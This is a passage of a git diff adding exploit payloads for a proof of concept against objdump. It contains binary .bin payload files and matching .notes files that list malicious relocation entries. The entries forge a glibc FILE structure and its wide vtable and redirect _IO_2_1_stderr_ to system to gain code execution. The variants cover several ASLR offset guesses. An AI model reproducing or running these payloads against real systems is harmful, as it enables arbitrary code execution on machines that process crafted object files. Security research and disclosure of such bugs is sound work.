@@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f42e600 +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..08b387c203f0286d10673da49263b60bac640f8a GIT binary patch literal 1280 zcmd5*+e%wO6kR7L=3Xun$EsUND;AM6gf&h5kgJ z)PL|%8$ZAwC<^rtd^oOsZXV}B`sl#S+H37~c4j7fel9G3vJw`eVXggU924wYFE{0_ zV@M+vd0$kJ*aPe=kf;I4tm|IZfi~eSASHMOq(yH48S>l>kQLmF0ZvnlcUjcohF9Q7u|LO*U z8ypO9=-C@(vDp8@o$*loz=G?##ALzeNyc%W#`Wk~EZ=VU^M;@M#(m6RH2l4Wf56DU zG4jJke#FSXZA{2^qy3K?{t3fhu2=rX&o^WEKN$XxD_;4ie#P*AHvCKEa1ogfPK_&*>$CNq5J^75sp z!V$)43h{oNCFdK7Mwly7VgF-3$XpO*N*(W>i5X7m3*o`ASj##mY2#$8dw%K7@qiO# Z*k8DO^Fn_Kf43~jM_t}C<{r7f_XpdLfS~{Y literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes new file mode 100644 index 0000000..bd5c091 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes 
@@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..050c5e949c58bc3ace505698c91cb102d9f0cda6 GIT binary patch literal 1280 zcmd5*+e%wO6kR7L=3Xun$EsUND;AM6gf&h5kgJ z)PL|%8$ZA=s6zb%AC7CEo5y*OJ~}Y7_F8+Lotep=p9{;Mtb~PVSZlu-#{~P<%T0Of z7}7{Z-WL@l_5eEzBx*o1>$;b9piOuSNC{p6Y0(=%hCFuzWCeM?cENv~f_Fd%(LMq4 zf~P>IeD@1@WwUk;=%SwN0J=rL1`49@0Y%Ykz-#J%x_}y^Lp^UWCk4~GBaidR0WUorfj4gV6k+-rEBD~x4? z{HsqRzWRjgNoWP_K$oGXpx;4HL(f3ZLceE9(#$Iw6dj5dMUSFM(WPip^f~l7Qinc= zK8NqG)T|yiQQE9-9BqH!J=m(FbXcuD;rhpZbA1CP-8}ShCy0VQ{trlx$qe7QynN}Y zaD;K1LcAYm$@xa25$1|i*#DRhG8aUdQpdYzVun-tLU=GN*0Rn?+Bn(jo?m)%Jm3Tw Z_7^VSywG35-z`h>QJ43Oxkv8r{Q=$CfT92Z literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..739c8e2 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes 
@@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..05ff64425110398d125c38f83e640d443d6daf1f GIT binary patch literal 1280 zcmd5*%}QHA7(F*PdK05o6SdU}E)*&ViF0GsQc8tT6)GsW5bUBT#vc+jI1%isuh5rp zrM`nptv-M+P!#GLba8vW`{#8Q;?jYc^PTgZ`(z`ictp7Z74|=7!psFxrquE8nV8{}z7QS`i?ytCk`_+3y6>0X91A%? ahP}k)n;!;C^t)wAKIrnE@#%pFd;bsJ+km0~ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes new file mode 100644 index 0000000..ec4714e --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes 
@@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x05 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..06666223aa853f25e2c88c654b1c1be5a9cae54f GIT binary patch literal 1280 zcmd5*+e#Zz6kU^v#>Bg6)2f9&C|D3i&m`WEVyUzWEm-hD&<8OzUN9QTiJ(vZLVv<1 z?LYYF?F0M*71}@O!?^ZbGUItDee8iVYp=D}?3~%z=j7AZ&sNGpb6KmWj1z+W=;uoQ z^Bpp1ZF>K!AhiqFSs+yf(pk^DssSy+Z-7?8TOcF)0nkR?{s3eJ`F%OTU)+Mffexa5 z26PIZ16}go51`v-?RKDtdb$JX75xtA6MYxRi(Um@P`~a0UW$GL6hyxTUWvX4yiNtJ z>km6P5aQrpJIZ2-|Ai;xNAU#oPT@>GnYi!QpfKzv5i~iLU_0=*0L^0TDUptzF%f@G~@(X Z_BTG({4jV#zgv`Ktjm4I`Y literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes new file mode 100644 index 0000000..84c8d98 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes 
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..795cdeecc9b3852ed9fff02a778fa72df9171e6f GIT binary patch literal 1280 zcmd5*%}QHA7(F*PKSpEKq*bGZE?Tez(dZ{XtgeD^20nMLWc12gA4=R5by%;cM|uin14VitPC`uL4;M6hqY z+@iNWM+(WF_rD5ab-+#ou?7%NyY5vJNC^p`{TB@Xyx}i3*RP}JD;xe5!@pJ)cfbC+;eTWJH_7E*!~3i< zmJ#yzKJD=j16(gaD`*G01ic8o1icJhhOR)rU`o==D;g9XiWWtWqDj%EXjAk#^f^+8 zK8HSs@2}XZowZQht?iudeL6V$+(hxD))?UW%VBGK2SwdF@o_(hf<68VNRP=3-?_Ye z>8Wspaf(8;A1ma1BfSyka#Yy=co}3ai87^*chAHjPU#Eb!LV4%`bm=DWUG6A>CHmG b2{P<=T(-Q>U&7xlNwTlYd&X*?`+NTbW9omR literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes new file mode 100644 index 0000000..6932c59 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes 
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..47f529fa79c81d633402a83fc007e97b83963d51 GIT binary patch literal 1280 zcmd5*%}QHA7(F*PKSpEKq*bGZE?Te)#e8@RYV-~CB$W>LEAz|8s1`Of_^Gx_H0tGBPMn1$Z3K7L~y5$szp zx9F|UkwUWP{jY*p9kA0ttO3N+u6xx462jX+Qm_N0L_Y?G$VYB~v>?wnEO^H$_#4O& z?F(R3@H_B8zB>oTY}OtD#;M0Mz=Y^sAS-$u$cf$n9#a1`4m=XQ4NQvO0j5OX0H$O9 z)#Za5oC$FDuQ$qKk^hA|K+?j!!3;h!}8 zc_aVW$UiaiPmTOsbAd{K{{_Q8Z}>~i_3P;Q%7%Z%@UK`*O>(){@II@I zWrX~_Pka2s0M`r93fh4#K`%ltK`%p>p)1fYn36Q}iUvi8qD9f8Xi{`3+7x{beU8+j z&!NxZ`zy9;XDt+WYdfcVpAL>bH&HyPH3qo;a@gA5K~c9(eB2MBV2}R-(ql5icP=kq zdMX@YoT3oz#|k;$NN92NFIUIv*!m+*H>lI-j9p0V2J{@(upW;B1J literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes new file mode 100644 index 0000000..6fe7aff --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes 
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..d912cc46a01fdb57185e17b00c033d60c17bfbb2 GIT binary patch literal 1280 zcmd5*%}QHA7(F*P8e`O^rdqWH7YY@G)Vc8&DGE{*DnxK0=t2ypRg5NNBG^@5!I$XD z_8naM_W*eTQP4MVaeKb|libWgx^!UXeCK@Uewmqk^Xu!{vK6z?7}nNr#u34O@N$#h zI)((=8{StH#0~*F3B*c3Jn6buWuQ&?4bU!l3nWCZ03GD1dmt&u^K}Y7atb~HT}1mF z=ob6~^vHK-z#E&jQ$U(}ybE|MdL8H${Se5AUIN}xzfJ>vqTc}hqTd4VMPCI5V*b?) z1~)hq;D;A)l*Jk{L=K94hw@&xLme`b&m?#qfV4mwOHGGtXE? z$Txi2;F~R6Pe3bZ2Ra8m2|Wcp4Lt)r3q8k_q?uPVC^{4^iXKIiqD#@H=yT|Eqz-)! zeGcDWwpKi?A-h*Boc!21IR0KnwpuK;aQ*YBwp&0}*Q!452T`!c{{iVSnc+K^moGgP zjxbJ8i1y9&myT Zd!5U+7y3*1yE#cVb$QSD(&YZ${{dz;f1>~Z literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes new file mode 100644 index 0000000..92b2353 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes 
@@ -0,0 +1,34 @@
+layout=wsl2404
+flag_byte4=0x06
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb0 rbase=0x220
+sec_size_offset=0x38
+
+000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8
+007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8
+008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec
+009 target=0xbec sym=0x000000ff finish write bytes at 0xbec
+010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..98a9e31d780a1dbd2586b3370de7ed3e84df84ab GIT binary patch literal 1280 zcmd5*%St0b6g{0zjL|qg;w$5TixCurXmxZ{L=;6wa6n-e12YRzj1P=PtO&aD7yOA? zssG^8*9Z6oGlKqsi}u`prLBd`atf-?J?EajslK^&I{$6KN?3@N_47C5m|#D8xe@O< zfHdkN?|&5}b^$vBB+5WC*rAn%<4%{FT{0xi^&S)f()2cS*#T_7iV8EB_|+X8fmeg|}leh+ksz6f+D{MO}z z4t@-<=iQF7SnPk{$@o!x!Gi0$#AKV#lZ@j$jfcL=SiZsVHyM7O8!s_`&hU2{{=AX@ zWaN8|{AVNIe=sD+jm|%4_=gOCu`>H7?jJM!lZJnK*()E_pELYl4gV6k^fm0~GGkdG z|L)U>|9HdoFtmbppo`EW(4){_pvR!cp(mJjb-X?k>$znvga^xFE$fOT#m!Oo{4$$^0Vl|^ YSNQnlh5jS_-J&FGy4+_>)wqB5SCqMbq5uE@ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes new file mode 100644 index 0000000..653f33e --- /dev/null +++ 